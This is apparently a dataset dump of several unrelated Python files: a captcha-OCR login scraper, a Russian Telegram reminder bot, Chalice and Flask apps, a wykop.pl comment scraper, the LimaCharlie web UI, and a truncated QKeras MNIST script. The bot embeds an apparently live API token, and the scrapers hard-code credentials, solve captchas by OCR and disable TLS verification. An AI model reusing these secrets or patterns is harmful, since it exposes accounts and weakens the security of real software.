img_object.flush()\nimage=Image.open('checkcode.jpg')\ncode=pytesseract.image_to_string(image)\nprint(code)\n#####根据得到的验证码登录系统\ncode='&checkCode='+code\nurl='http://localhost:8080/tdd/login.action'\npostdata={\"loginName\":\"ddwl\",\"password\":\"ddwl\",\"checkCode\":\"2503\",\"platfromFlag\":\"localhost:8080\"}\ndata='?loginName=ddwl&password=ddwl&platformFlag=localhost:8080'\nheaders={'content-type': 'application/json'}\nr=requests.post(url+data+code,headers=headers,data=postdata)\n\nhtml=r.content\nhtml_doc=str(html,'utf-8') #html_doc=html.decode(\"utf-8\",\"ignore\")\nprint(html_doc)\n###进入主页爬取内容\nmain_url='http://localhost:8080/tdd/manager/manager_managerCenter.action'\nr_main=requests.post(main_url,cookies=r.cookies)\n\nif os.path.exists('main.txt'):\n os.remove('main.txt')\nwith open('main.txt','ab') as main_content:\n main_content.write(r_main.content)\n main_content.flush()\nsoup=BeautifulSoup(r_main.text,'html.parser',from_encoding='utf-8')\nlinks=soup.find_all('a', href=re.compile(r\"/tdd/\\w+\"))\nprint(links)\nnew_urls=set()\nfor link in links:\n url='http://localhost:8080'+link['href']\n new_urls.add(url)\nprint(new_urls)\n\nif os.path.exists('data.txt'):\n os.remove('data.txt')\n\nwith open('data.txt','w') as data_content:\n\n for url in new_urls:\n r_table=requests.post(url,cookies=r.cookies)\n soup_table=BeautifulSoup(r_table.text,'html.parser',from_encoding='utf-8')\n tags=soup_table.find_all('td')\n txt=[]\n for tag in tags:\n txt.append(tag.get_text())\n # print(soup_table.find_all('td'))\n data_content.write(str(txt))\n data_content.flush()","sub_path":"PycharmProjects/spiderdida/spider.py","file_name":"spider.py","file_ext":"py","file_size_in_byte":2090,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"120729888","text":"from typing import Dict, Any, List\n\nimport telebot, datetime\nfrom telebot.types import CallbackQuery\n\n\nclass RiskyObject:\n name: str\n last_checked: datetime.date\n\n def __init__(self, name, last_checked=datetime.datetime.min):\n self.name = name\n self.last_checked = last_checked\n def __repr__(self):\n return self.name + \": \" + str(self.last_checked)\n\n\n\nACTION_ADD = 'Добавить'\nACTION_DELETE = 'Удалить'\nACTION_DO = 'Отметить действие'\nACTION_LIST = 'Проверить'\nACTION_INIT_FILL = 'Создай'\nACTION_NO_INIT_FILL = 'Не надо, сам создам'\nACTION_BACK = 'Назад'\nACTION_MENU = 'Меню'\n\nbot = telebot.TeleBot('1492966650:AAE8kbS_X662fK0XEAgazR-vrSRd7sdFEwU')\nobjects_map: Dict[int, List[RiskyObject]] = {}\n\nkeyboardMain = telebot.types.ReplyKeyboardMarkup(resize_keyboard=True)\nkeyboardMain.row(ACTION_DO, ACTION_LIST)\nkeyboardMain.row(ACTION_ADD, ACTION_DELETE)\n\nkeyboardStart = telebot.types.ReplyKeyboardMarkup(resize_keyboard=True)\nkeyboardStart.row(ACTION_INIT_FILL, ACTION_NO_INIT_FILL)\n\n\ndef print_db():\n print(objects_map)\n\n@bot.message_handler(commands=['start'])\ndef start_message(message):\n bot.send_message(message.chat.id, 'Привет, я помогу тебе не волноваться об утюге, плите или незакрытой двери - '\n 'просто отметь все перед выходом. Можешь даже сфотографировать (скоро добавим),'\n ' если мне не доверяешь. Для начала надо добавить объекты или действия,'\n ' которые тебя регулярно тревожат. Я могу помочь и создать три самых популярных -'\n ' выключить утюг, выключить плиту, закрыть дверь', reply_markup=keyboardStart)\n\n\n@bot.message_handler(func=lambda message: message.text == ACTION_INIT_FILL)\ndef on_init_fill_request(message):\n add_item(message.from_user.id, 'Выключить плиту')\n add_item(message.from_user.id, 'Выключить утюг')\n add_item(message.from_user.id, 'Закрыть дверь')\n bot.send_message(message.chat.id, 'Добавил!', reply_markup=keyboardMain)\n print_db()\n\n\ndef on_add_item_request(message):\n add_item(message.from_user.id, message.text)\n bot.send_message(message.chat.id, 'Добавлeно!', reply_markup=keyboardMain)\n print_db()\n\n\n\n@bot.message_handler(func=lambda message: message.text == ACTION_ADD)\ndef on_add_request(message):\n msg = bot.send_message(message.chat.id, 'Введи действие: ')\n bot.register_next_step_handler(msg, on_add_item_request)\n\n\n@bot.message_handler(func=lambda message: message.text == ACTION_DELETE)\ndef on_delete_request(message):\n if message.from_user.id in objects_map and len(objects_map[message.from_user.id]) > 0:\n keyboard_actions = telebot.types.ReplyKeyboardMarkup(resize_keyboard=True)\n keyboard_actions.row(*[obj.name for obj in objects_map[message.from_user.id]])\n keyboard_actions.row(telebot.types.KeyboardButton(ACTION_BACK))\n bot.send_message(message.chat.id, 'Какое действие хочешь удалить?', reply_markup=keyboard_actions)\n else:\n bot.send_message(message.chat.id, 'А удалять то нечего(',\n reply_markup=keyboardMain)\n\n\n\n@bot.message_handler(func=lambda message: message.text == ACTION_DO)\ndef on_do_action_request(message):\n if message.from_user.id in objects_map and len(objects_map[message.from_user.id]) > 0:\n keyboard_actions = telebot.types.ReplyKeyboardMarkup(resize_keyboard=True)\n keyboard_actions.row(*[obj.name for obj in objects_map[message.from_user.id]])\n keyboard_actions.row(telebot.types.KeyboardButton(ACTION_BACK))\n msg = bot.send_message(message.chat.id, 'Слава, что ты сделал?', reply_markup=keyboard_actions)\n bot.register_next_step_handler(msg, on_do_exact_action_request)\n else:\n bot.send_message(message.chat.id, 'Сначала добавь актвности, за которые ты переживаешь.',\n reply_markup=keyboardMain)\n\n\ndef on_do_exact_action_request(message):\n refresh_item_time(message.from_user.id, message.text)\n bot.send_message(message.chat.id, 'Отлично!', reply_markup=keyboardMain)\n print_db()\n\n\n@bot.message_handler(func=lambda message: message.text == ACTION_LIST)\ndef on_list_request(message):\n if message.from_user.id in objects_map and len(objects_map[message.from_user.id]) > 0:\n for obj in objects_map[message.from_user.id]:\n bot.send_message(message.chat.id,\n 'Действие ' + obj.name + ', совершено в ' + obj.last_checked.strftime(\n \"%d/%m, %H:%M:%S\"))\n else:\n bot.send_message(message.chat.id, 'Пока что ты не за что не переживаешь :D', reply_markup=keyboardMain)\n\n\n@bot.message_handler(func=lambda message: message.text == ACTION_BACK)\n@bot.message_handler(func=lambda message: message.text == ACTION_MENU)\n@bot.message_handler(func=lambda message: message.text == ACTION_NO_INIT_FILL)\ndef on_back_to_menu_request(message):\n bot.send_message(message.chat.id, ACTION_MENU, reply_markup=keyboardMain)\n\n@bot.message_handler(func=lambda message: message.from_user.id in objects_map and message.text in [obj.name for obj in\n objects_map[\n message.from_user.id]])\ndef on_delete_item_request(message):\n stored_obj: RiskyObject = [obj for obj in objects_map[message.from_user.id] if obj.name == message.text][0]\n objects_map[message.from_user.id].remove(stored_obj)\n bot.send_message(message.chat.id, 'Удалено!', reply_markup=keyboardMain)\n print_db()\n\n\ndef add_item(user_id, item_name):\n if user_id not in objects_map:\n objects_map[user_id] = []\n\n objects_map[user_id].append(RiskyObject(item_name, datetime.datetime.min))\n\n\ndef refresh_item_time(user_id, item_name):\n stored_obj: RiskyObject = [obj for obj in objects_map[user_id] if obj.name == item_name][0]\n stored_obj.last_checked = datetime.datetime.now()\n\n\nbot.polling()\n\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6673,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"145578871","text":"import json\nfrom chalice import Chalice, CORSConfig\nfrom datetime import datetime, timedelta, date, time\nfrom chalicelib import data_funcs\n\napp = Chalice(app_name='data-dashboard')\n\ncors_config = CORSConfig(\n allow_origin='https://dashboard.transitmatters.org',\n max_age=3600\n)\n\ndef destructure_date(date):\n date_split = date.split('-')\n return {\n 'year': int(date_split[0]),\n 'month': int(date_split[1]),\n 'day': int(date_split[2])\n }\n\n@app.route(\"/headways/{user_date}\", cors=cors_config)\ndef headways_route(user_date):\n station = app.current_request.query_params.get('station')\n parsed_date = destructure_date(user_date)\n return data_funcs.headways(date(year=parsed_date['year'], month=parsed_date['month'], day=parsed_date['day']), {\"stop\": station})\n\n\n@app.route(\"/dwells/{user_date}\", cors=cors_config)\ndef dwells_route(user_date):\n station = app.current_request.query_params.get('station')\n parsed_date = destructure_date(user_date)\n return data_funcs.dwells(date(year=parsed_date['year'], month=parsed_date['month'], day=parsed_date['day']), {\"stop\": station})\n\n\n@app.route(\"/traveltimes/{user_date}\", cors=cors_config)\ndef traveltime_route(user_date):\n station_from = app.current_request.query_params.get('station_from')\n station_to = app.current_request.query_params.get('station_to')\n parsed_date = destructure_date(user_date)\n return data_funcs.travel_times(\n date(year=parsed_date['year'], month=parsed_date['month'], day=parsed_date['day']), {\"from_stop\": station_from, \"to_stop\": station_to}\n )\n","sub_path":"server/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1594,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"364449774","text":"from flask import Flask, render_template\nfrom flask_login import UserMixin\nfrom flask.ext.bootstrap import Bootstrap, WebCDN, ConditionalCDN, BOOTSTRAP_VERSION, JQUERY_VERSION, HTML5SHIV_VERSION, RESPONDJS_VERSION \n\napp = Flask(__name__)\nbootstrap = Bootstrap(app)\n\ndef change_cdn_domestic(tar_app):\n static = tar_app.extensions['bootstrap']['cdns']['static']\n local = tar_app.extensions['bootstrap']['cdns']['local']\n\n def change_one(tar_lib, tar_ver, fallback):\n tar_js = ConditionalCDN('BOOTSTRAP_SERVE_LOCAL', fallback,\n WebCDN('//cdn.bootcss.com/' + tar_lib + '/' + tar_ver + '/'))\n tar_app.extensions['bootstrap']['cdns'][tar_lib] = tar_js\n\n libs = {'jquery': {'ver': JQUERY_VERSION, 'fallback': local},\n 'bootstrap': {'ver': BOOTSTRAP_VERSION, 'fallback': local},\n 'html5shiv': {'ver': HTML5SHIV_VERSION, 'fallback': static},\n 'respond.js': {'ver': RESPONDJS_VERSION, 'fallback': static}}\n for lib, par in libs.items():\n change_one(lib, par['ver'], par['fallback'])\n\nchange_cdn_domestic(app)\n\n@app.route('/user/',methods=['GET','POST'])\ndef user(name):\n #if request.method =='POST':\n # content = request.form['content']\n # return render_template('user1.html', name=content)\n return render_template('user.html', name=name)\n\n@app.route('/abstract/')\ndef abstract():\n return render_template('abstract.html', title_name = 'abstract demo')\n\n@app.route('/')\ndef home():\n return render_template('home.html', title_name = 'welcome')\n\nif __name__ == '__main__':\n app.run()\n","sub_path":"logintest.py","file_name":"logintest.py","file_ext":"py","file_size_in_byte":1588,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"390132497","text":"from requests_html import AsyncHTMLSession\nimport re\nfrom openpyxl import Workbook, load_workbook\n\nclass Scraper(AsyncHTMLSession):\n def __init__(self):\n AsyncHTMLSession.__init__(self)\n self.comments = []\n self.scraped_pages = []\n \n async def __comments(self, links):\n \"\"\"\n Private method to scrap comments from passed list of topics.\n It opens each topic and scrap the avaialbe comments.\n \n links:array - All topics from the certain page\n \"\"\"\n for link in links:\n try:\n link_response = await self.get(link, verify=False)\n link_comments = link_response.html.find(\"div[class='text'] p\")\n for comment in link_comments:\n try:\n r = re.search(r'(?:: )(.*)', comment.text)\n self.comments.append(r.group(0)[1:])\n except AttributeError:\n self.comments.append(comment.text)\n except:\n continue\n\n async def _base(self, range1, range2):\n \"\"\"\n Main pattern to scrap topics from pages\n range1:int - Iteration start\n range2:int - Iteration stop\n \"\"\"\n for x in range(range1, range2):\n try:\n site_content = await self.get(f\"https://www.wykop.pl/strona/{x}/\", verify=False)\n topics = site_content.html.find(\"div[class='lcontrast m-reset-margin'] h2 a\")\n links = ([topic.attrs[\"href\"] for topic in topics])\n await self.__comments(links)\n except:\n continue\n\nclass Excel(Workbook):\n def __init__(self):\n Workbook.__init__(self)\n self.ws = self.active\n self.workbook_name = f\"list.xlsx\"\n try:\n self.load = load_workbook(self.workbook_name)\n except FileNotFoundError:\n headers = \"comment\"\n self.ws.cell(row=1, column=1, value=headers) #// +1 because it must be at least 1\n self.save(self.workbook_name)\n \n def add_data(self, comments):\n \"\"\"Writes data to excel\"\"\"\n self.load = load_workbook(self.workbook_name)\n self.ns = self.load.get_sheet_by_name(\"Sheet\")\n for comment in comments:\n try:\n if len(comment) > 0:\n data_row = [comment]\n self.ns.append(data_row)\n except:\n continue\n self.load.save(self.workbook_name)\n\nclass Tasks(Scraper, Excel):\n def __init__(self, iterations=5):\n self.iterations = iterations\n Scraper.__init__(self)\n Excel.__init__(self)\n \n def task_creator(self):\n \"\"\"\n Creates dynamic async functions and store them in \n array whichc is unziped to asyncio loop starter\n \"\"\"\n functions = []\n first = 3000\n second = 3300\n for x in range(self.iterations):\n async def base(range1=first,range2=second):\n await self._base(range1, range2)\n functions.append(base)\n if first and second < 6000:\n first += 300\n second += 300\n else: break\n return functions\n\n def start(self):\n self.run(*self.task_creator())\n self.add_data(self.comments)\n \nif __name__ == \"__main__\":\n T = Tasks(iterations=8)\n T.start()\n","sub_path":"asynchronic.py","file_name":"asynchronic.py","file_ext":"py","file_size_in_byte":3423,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"592142062","text":"from django.urls import path\n\nfrom .views import (\n EventCategoriesView,\n EventsView,\n SingleEventView,\n EventSignUpsView,\n EventLikesView,\n EventCommentsView,\n)\n\nurlpatterns = [\n path(\"\", EventsView.as_view(), name=\"events\"),\n path(\"categories\", EventCategoriesView.as_view(), name=\"event_categories\"),\n path(\"signups\", EventSignUpsView.as_view(), name=\"event_sign_ups\"),\n path(\"likes\", EventLikesView.as_view(), name=\"event_likes\"),\n path(\"comments\", EventCommentsView.as_view(), name=\"event_comments\"),\n path(\"\", SingleEventView.as_view(), name=\"single_event\"),\n]\n","sub_path":"backend/eventology/events/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":617,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"214478698","text":"# Copyright 2015 refractionPOINT\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nfrom gevent import monkey\nmonkey.patch_all()\n\nimport os\nimport sys\n\nfrom beach.beach_api import Beach\n\nimport traceback\nimport web\nimport datetime\nimport time\nimport json\nimport base64\nfrom functools import wraps\n\n\n###############################################################################\n# CUSTOM EXCEPTIONS\n###############################################################################\n\n\n###############################################################################\n# REFERENCE ELEMENTS\n###############################################################################\n\n\n###############################################################################\n# CORE HELPER FUNCTIONS\n###############################################################################\ndef tsToTime( ts ):\n return datetime.datetime.fromtimestamp( int( ts ) ).strftime( '%Y-%m-%d %H:%M:%S' )\n\ndef timeToTs( timeStr ):\n return time.mktime( datetime.datetime.strptime( timeStr, '%Y-%m-%d %H:%M:%S' ).timetuple() )\n\ndef _xm_( o, path, isWildcardDepth = False ):\n def _isDynamicType( e ):\n eType = type( e )\n return issubclass( eType, dict ) or issubclass( eType, list ) or issubclass( eType, tuple )\n\n def _isListType( e ):\n eType = type( e )\n return issubclass( eType, list ) or issubclass( eType, tuple )\n\n def _isSeqType( e ):\n eType = type( e )\n return issubclass( eType, dict )\n\n result = []\n oType = type( o )\n\n if type( path ) is str or type( path ) is unicode:\n tokens = [ x for x in path.split( '/' ) if x != '' ]\n else:\n tokens = path\n\n if issubclass( oType, dict ):\n isEndPoint = False\n if 0 != len( tokens ):\n if 1 == len( tokens ):\n isEndPoint = True\n\n curToken = tokens[ 0 ]\n\n if '*' == curToken:\n if 1 < len( tokens ):\n result = _xm_( o, tokens[ 1 : ], True )\n elif '?' == curToken:\n if 1 < len( tokens ):\n result = []\n for elem in o.itervalues():\n if _isDynamicType( elem ):\n result += _xm_( elem, tokens[ 1 : ], False )\n\n elif o.has_key( curToken ):\n if isEndPoint:\n result = [ o[ curToken ] ] if not _isListType( o[ curToken ] ) else o[ curToken ]\n elif _isDynamicType( o[ curToken ] ):\n result = _xm_( o[ curToken ], tokens[ 1 : ] )\n\n if isWildcardDepth:\n tmpTokens = tokens[ : ]\n for elem in o.itervalues():\n if _isDynamicType( elem ):\n result += _xm_( elem, tmpTokens, True )\n elif issubclass( oType, list ) or oType is tuple:\n result = []\n for elem in o:\n if _isDynamicType( elem ):\n result += _xm_( elem, tokens )\n\n return result\n\ndef _x_( o, path, isWildcardDepth = False ):\n r = _xm_( o, path, isWildcardDepth )\n if 0 != len( r ):\n r = r[ 0 ]\n else:\n r = None\n return r\n\ndef sanitizeJson( o, summarized = False ):\n if type( o ) is dict:\n for k, v in o.iteritems():\n o[ k ] = sanitizeJson( v, summarized = summarized )\n elif type( o ) is list or type( o ) is tuple:\n o = [ sanitizeJson( x, summarized = summarized ) for x in o ]\n else:\n try:\n json.dumps( o )\n except:\n o = base64.b64encode( o )\n if summarized is not False and len( str( o ) ) > summarized:\n o = str( o[ : summarized ] ) + '...'\n\n return o\n\ndef downloadFileName( name ):\n web.header( 'Content-Disposition', 'attachment;filename=\"%s\"' % name )\n\n###############################################################################\n# PAGE DECORATORS\n###############################################################################\ndef jsonApi( f ):\n ''' Decorator to basic exception handling on function. '''\n @wraps( f )\n def wrapped( *args, **kwargs ):\n web.header( 'Content-Type', 'application/json' )\n r = f( *args, **kwargs )\n try:\n return json.dumps( r )\n except:\n return json.dumps( { 'error' : str( r ) } )\n return wrapped\n\ndef fileDownload( f ):\n ''' Decorator to basic exception handling on function. '''\n @wraps( f )\n def wrapped( *args, **kwargs ):\n web.header( 'Content-Type', 'application/octet-stream' )\n return f( *args, **kwargs )\n return wrapped\n\n###############################################################################\n# PAGES\n###############################################################################\nclass Index:\n def GET( self ):\n return render.index()\n\nclass Dashboard:\n def GET( self ):\n\n sensors = model.request( 'list_sensors', {} )\n\n if not sensors.isSuccess:\n return render.error( str( sensors ) )\n\n return render.dashboard( sensors = sanitizeJson( sensors.data ) )\n\nclass Sensor:\n def GET( self ):\n params = web.input( sensor_id = None, before = None, after = None, max_size = '4096', per_page = '10' )\n\n if params.sensor_id is None:\n return render.error( 'sensor_id required' )\n\n info = model.request( 'get_sensor_info', { 'id_or_host' : params.sensor_id } )\n\n if not info.isSuccess:\n return render.error( str( info ) )\n\n if 0 == len( info.data ):\n return render.error( 'Sensor not found' )\n\n before = None\n after = None\n\n if '' != params.before:\n before = params.before\n if '' != params.after:\n after = params.after\n\n return render.sensor( info.data[ 'id' ], before, after, params.max_size, params.per_page )\n\nclass SensorState:\n @jsonApi\n def GET( self ):\n params = web.input( sensor_id = None )\n\n if params.sensor_id is None:\n raise web.HTTPError( '400 Bad Request: sensor id required' )\n\n info = model.request( 'get_sensor_info', { 'id_or_host' : params.sensor_id } )\n\n if not info.isSuccess:\n raise web.HTTPError( '503 Service Unavailable: %s' % str( info ) )\n\n if 0 == len( info.data ):\n raise web.HTTPError( '204 No Content: sensor not found' )\n\n return info.data\n\nclass Timeline:\n @jsonApi\n def GET( self ):\n params = web.input( sensor_id = None, after = None, before = None, max_size = '4096', rich = 'false', max_time = None )\n\n if params.sensor_id is None:\n raise web.HTTPError( '400 Bad Request: sensor id required' )\n\n if params.after is None or '' == params.after:\n raise web.HTTPError( '400 Bad Request: need start time' )\n\n start_time = int( params.after )\n max_size = int( params.max_size )\n max_time = 60 * 60 * 4\n if params.max_time is not None and '' != params.max_time:\n max_time = int( params.max_time )\n end_time = None\n if params.before is not None and '' != params.before:\n end_time = int( params.before )\n rich = True if params.rich == 'true' else False\n\n if 0 != start_time:\n effective_end_time = int( time.time() )\n if end_time is not None:\n effective_end_time = end_time\n if max_time < ( effective_end_time - start_time ):\n raise web.HTTPError( '400 Bad Request: maximum time lapse: %d - %d > %d' % ( effective_end_time, start_time, max_time ) )\n\n if 0 == start_time:\n start_time = int( time.time() ) - 5\n\n req = { 'id' : params.sensor_id,\n 'is_include_content' : True,\n 'after' : start_time }\n\n if not rich:\n req[ 'max_size' ] = max_size\n\n if end_time is not None:\n req[ 'before' ] = end_time\n\n info = model.request( 'get_timeline', req )\n\n if not info.isSuccess:\n return render.error( str( info ) )\n\n if 0 == int( params.after ):\n info.data[ 'new_start' ] = start_time\n\n if rich:\n originalEvents = info.data.get( 'events', [] )\n info.data[ 'events' ] = []\n for event in originalEvents:\n richEvent = None\n if hasattr( eventRender, event[ 1 ] ):\n try:\n richEvent = str( getattr( eventRender, event[ 1 ] )( sanitizeJson( event[ 3 ] ) ) )\n except:\n richEvent = None\n if richEvent is None:\n richEvent = str( eventRender.default( sanitizeJson( event[ 3 ], summarized = 1024 ) ) )\n\n info.data[ 'events' ].append( ( event[ 0 ],\n event[ 1 ],\n event[ 2 ],\n richEvent ) )\n return info.data\n\nclass ObjSearch:\n def GET( self ):\n params = web.input( objname = None )\n\n if params.objname is None:\n return render.error( 'Must specify an object name' )\n\n objects = model.request( 'get_obj_list', { 'name' : params.objname } )\n\n if not objects.isSuccess:\n return render.error( str( objects ) )\n\n return render.objlist( sanitizeJson( objects.data[ 'objects' ] ), None )\n\nclass ObjViewer:\n def GET( self ):\n params = web.input( sensor_id = None, id = None )\n\n if params.id is None:\n return render.error( 'need to supply an object id' )\n\n req = { 'id' : params.id }\n\n if params.sensor_id is not None:\n req[ 'host' ] = params.sensor_id\n\n info = model.request( 'get_obj_view', req )\n\n if not info.isSuccess:\n return render.error( str( info ) )\n\n return render.obj( sanitizeJson( info.data ), params.sensor_id )\n\nclass LastEvents:\n @jsonApi\n def GET( self ):\n params = web.input( sensor_id = None )\n\n if params.sensor_id is None:\n raise web.HTTPError( '400 Bad Request: sensor id required' )\n\n info = model.request( 'get_lastevents', { 'id' : params.sensor_id } )\n\n if not info.isSuccess:\n raise web.HTTPError( '503 Service Unavailable : %s' % str( info ) )\n\n return info.data.get( 'events', [] )\n\nclass EventView:\n def GET( self ):\n params = web.input( id = None, summarized = 1024 )\n\n if params.id is None:\n return render.error( 'need to supply an event id' )\n\n info = model.request( 'get_event', { 'id' : params.id } )\n\n if not info.isSuccess:\n return render.error( str( info ) )\n\n return render.event( sanitizeJson( info.data.get( 'event', {} ), summarized = params.summarized ) )\n\nclass HostObjects:\n def GET( self ):\n params = web.input( sensor_id = None, otype = None )\n\n if params.sensor_id is None:\n return render.error( 'need to supply a sensor id' )\n\n req = { 'host' : params.sensor_id }\n\n if params.otype is not None:\n req[ 'type' ] = params.otype\n\n objects = model.request( 'get_obj_list', req )\n\n return render.objlist( sanitizeJson( objects.data[ 'objects' ] ), params.sensor_id )\n\nclass JsonDetects:\n @jsonApi\n def GET( self ):\n params = web.input( before = None, after = None )\n\n if params.after is None or '' == params.after:\n raise web.HTTPError( '400 Bad Request: start time required' )\n\n start_time = None\n if params.after is not None:\n start_time = int( params.after )\n\n if start_time is None or 0 == start_time:\n start_time = int( time.time() ) - 5\n\n search = {}\n\n if start_time is not None:\n search [ 'after' ] = start_time\n\n if params.before is not None:\n search[ 'before' ] = int( params.before )\n\n detects = model.request( 'get_detects', search )\n\n if not detects.isSuccess:\n return render.error( str( detects ) )\n else:\n return detects.data\n\nclass ViewDetects:\n def GET( self ):\n params = web.input( before = None, after = None )\n\n before = None\n after = None\n\n if params.before is not None and '' != params.before:\n before = params.before\n if params.after is not None and '' != params.after:\n after = params.after\n\n return render.detects( before, after )\n\nclass ViewDetect:\n def GET( self ):\n params = web.input( id = None )\n\n if params.id is None:\n return render.error( 'need to supply a detect id' )\n\n info = model.request( 'get_detect', { 'id' : params.id, 'with_events' : True } )\n\n if not info.isSuccess:\n return render.error( str( info ) )\n\n return render.detect( sanitizeJson( info.data.get( 'detect', [] ) ) )\n\nclass HostChanges:\n @jsonApi\n def GET( self ):\n params = web.input( sensor_id = None )\n\n if params.sensor_id is None:\n raise web.HTTPError( '400 Bad Request: sensor id required' )\n\n info = model.request( 'get_host_changes', { 'id' : params.sensor_id } )\n\n if not info.isSuccess:\n raise web.HTTPError( '503 Service Unavailable : %s' % str( info ) )\n\n return info.data.get( 'changes', {} )\n\nclass DownloadFileInEvent:\n @fileDownload\n def GET( self ):\n params = web.input( id = None )\n\n if params.id is None:\n raise web.HTTPError( '400 Bad Request: event id required' )\n\n info = model.request( 'get_file_in_event', { 'id' : params.id } )\n\n if not info.isSuccess:\n raise web.HTTPError( '503 Service Unavailable : %s' % str( info ) )\n\n if 'path' not in info.data or 'data' not in info.data:\n return render.error( 'no file path or content found in event' )\n\n downloadFileName( '%s__%s' % ( params.id, ( info.data[ 'path' ].replace( '/', '_' )\n .replace( '\\\\', '_' )\n .replace( '.', '_' ) ) ) )\n\n return info.data[ 'data' ]\n\n###############################################################################\n# BOILER PLATE\n###############################################################################\nos.chdir( os.path.dirname( os.path.abspath( __file__ ) ) )\n\nurls = ( r'/', 'Index',\n r'/dashboard', 'Dashboard',\n r'/sensor', 'Sensor',\n r'/search', 'Search',\n r'/sensor_state', 'SensorState',\n r'/timeline', 'Timeline',\n r'/objsearch', 'ObjSearch',\n r'/obj', 'ObjViewer',\n r'/lastevents', 'LastEvents',\n r'/event', 'EventView',\n r'/hostobjects', 'HostObjects',\n r'/detects_data', 'JsonDetects',\n r'/detects', 'ViewDetects',\n r'/detect', 'ViewDetect',\n r'/hostchanges', 'HostChanges',\n r'/downloadfileinevent', 'DownloadFileInEvent')\n\nweb.config.debug = False\napp = web.application( urls, globals() )\n\nrender = web.template.render( 'templates', base = 'base', globals = { 'json' : json,\n 'tsToTime' : tsToTime,\n '_x_' : _x_,\n '_xm_' : _xm_,\n 'hex' : hex,\n 'sanitize' : sanitizeJson } )\neventRender = web.template.render( 'templates/custom_events', globals = { 'json' : json,\n 'tsToTime' : tsToTime,\n '_x_' : _x_,\n '_xm_' : _xm_,\n 'hex' : hex,\n 'sanitize' : sanitizeJson } )\n\nif len( sys.argv ) < 2:\n print( \"Usage: python app.py beach_config [listen_port]\" )\n sys.exit()\n\nbeach = Beach( sys.argv[ 1 ], realm = 'hcp' )\ndel( sys.argv[ 1 ] )\nmodel = beach.getActorHandle( 'models', nRetries = 3, timeout = 30, ident = 'lc/0bf01f7e-62bd-4cc4-9fec-4c52e82eb903' )\n\napp.run()","sub_path":"cloud/limacharlie/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":17082,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"587626179","text":"# Copyright 2020 Google LLC\n#\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n# ==============================================================================\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport argparse\nimport os\n\nos.environ[\"CUDA_DEVICE_ORDER\"] = \"PCI_BUS_ID\"\nos.environ[\"CUDA_VISIBLE_DEVICES\"] = \"\"\n\nfrom args import ParserArgs\n\nfrom tensorflow.keras.datasets import mnist\nfrom tensorflow.keras.layers import Activation\nfrom tensorflow.keras.layers import Conv2D\nfrom tensorflow.keras.layers import Dense\nfrom tensorflow.keras.layers import BatchNormalization\nfrom tensorflow.keras.layers import Flatten\nfrom tensorflow.keras.layers import Input\nfrom tensorflow.keras.models import Model\nfrom tensorflow.keras.optimizers import Adam\nfrom tensorflow.keras.utils import to_categorical\nfrom lo import *\nimport numpy as np\n\nfrom qkeras import print_qstats\nfrom qkeras import QActivation\nfrom qkeras import QConv2D\nfrom qkeras import QDense\nfrom qkeras import quantized_bits\nfrom qkeras import ternary\n\n\nnp.random.seed(42)\nOPTIMIZER = Adam(lr=0.002)\nNB_EPOCH = 10\nBATCH_SIZE = 32\nVERBOSE = 1\nNB_CLASSES = 10\nN_HIDDEN = 100\nVALIDATION_SPLIT = 0.1\nRESHAPED = 784\n\n\ndef QDenseModel(weights_f, load_weights=False):\n \"\"\"Construct QDenseModel.\"\"\"\n\n x = x_in = Input((28*28,), name=\"input\")\n x = QActivation(\"quantized_relu(2)\", name=\"act_i\")(x)\n\n x = Dense(100, name=\"d0\")(x)\n x = BatchNormalization(name=\"bn0\")(x)\n\n x = QActivation(\"quantized_relu(2)\", name=\"act0_m\")(x)\n\n x = Flatten(name=\"flatten\")(x)\n\n x = QDense(\n NB_CLASSES,\n kernel_quantizer=quantized_bits(4, 0, 1),\n bias_quantizer=quantized_bits(4, 0, 1),\n name=\"dense2\")(x)\n x = Activation(\"softmax\", name=\"softmax\")(x)\n\n model = Model(inputs=[x_in], outputs=[x])\n model.summary()\n model.compile(loss=\"categorical_crossentropy\",\n optimizer=OPTIMIZER, metrics=[\"accuracy\"])\n\n if load_weights and weights_f:\n model.load_weights(weights_f)\n\n return model\n\n\ndef UseNetwork(weights_f, load_weights=False):\n \"\"\"Use DenseModel.\n\n Args:\n weights_f: weight file location.\n load_weights: load weights when it is True.\n \"\"\"\n model = QDenseModel(weights_f, load_weights)\n\n batch_size = BATCH_SIZE\n (x_train_, y_train_), (x_test_, y_test_) = mnist.load_data()\n\n x_train_ = x_train_.reshape(60000, 28*28)\n x_test_ = x_test_.reshape(10000, 28*28)\n x_train_ = x_train_.astype(\"float32\")\n x_test_ = x_test_.astype(\"float32\")\n\n x_train_ /= 256.\n x_test_ /= 256.\n\n # x_train_ = 2*x_train_ - 1.0\n # x_test_ = 2*x_test_ - 1.0\n\n 